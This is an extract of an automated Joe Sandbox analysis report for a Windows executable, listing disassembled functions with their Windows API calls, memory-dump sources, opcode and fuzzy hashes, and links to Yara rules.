                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                              • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                              • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                              • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                              Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00433724
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                              • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                              • GetWindowRect.USER32(?,?), ref: 00433814
                                                                              • ScreenToClient.USER32(?,?), ref: 00433842
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                              • String ID:
                                                                              • API String ID: 3220332590-0
                                                                              • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                              • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                              • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                              • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                              Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1612042205-0
                                                                              • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                              • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                              • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                              • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                              Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                              • SendInput.USER32 ref: 0044C6E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$InputSend
                                                                              • String ID:
                                                                              • API String ID: 2221674350-0
                                                                              • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                              • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                              • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                              • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                              Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2037614760-0
                                                                              • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                              • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                              • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                              • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                              Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                              • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                              • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                              • EndPaint.USER32(?,?), ref: 00447CD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                              • String ID:
                                                                              • API String ID: 4189319755-0
                                                                              • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                              • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                              • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                              • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                              Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              • API String ID: 1726766782-0
                                                                              • Opcode ID: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                                                                              • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                              • Opcode Fuzzy Hash: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                                                                              • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                              Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                              • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                              • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                              • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 642888154-0
                                                                              • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                              • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                              • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                              • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                              Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                              • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow$InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 1976402638-0
                                                                              • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                              • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                              • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                              • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                              Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00442597
                                                                                • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                              • GetDesktopWindow.USER32 ref: 004425BF
                                                                              • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                              • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              • GetCursorPos.USER32(?), ref: 00442624
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                              • String ID:
                                                                              • API String ID: 4137160315-0
                                                                              • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                              • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                              • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                              • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                              Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 1871949834-0
                                                                              • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                              • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                              • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                              • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                              Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044961A
                                                                              • SendMessageW.USER32 ref: 0044964A
                                                                                • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                              • _wcslen.LIBCMT ref: 004496BA
                                                                              • _wcslen.LIBCMT ref: 004496C7
                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                              • String ID:
                                                                              • API String ID: 1624073603-0
                                                                              • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                              • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                              • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                              • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                              Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                              • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                              • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                              • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                              Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow$DeleteObject$IconMove
                                                                              • String ID:
                                                                              • API String ID: 1640429340-0
                                                                              • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                              • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                              • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                              • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                              Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                              • String ID:
                                                                              • API String ID: 3354276064-0
                                                                              • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                              • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                              • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                              • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                              Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
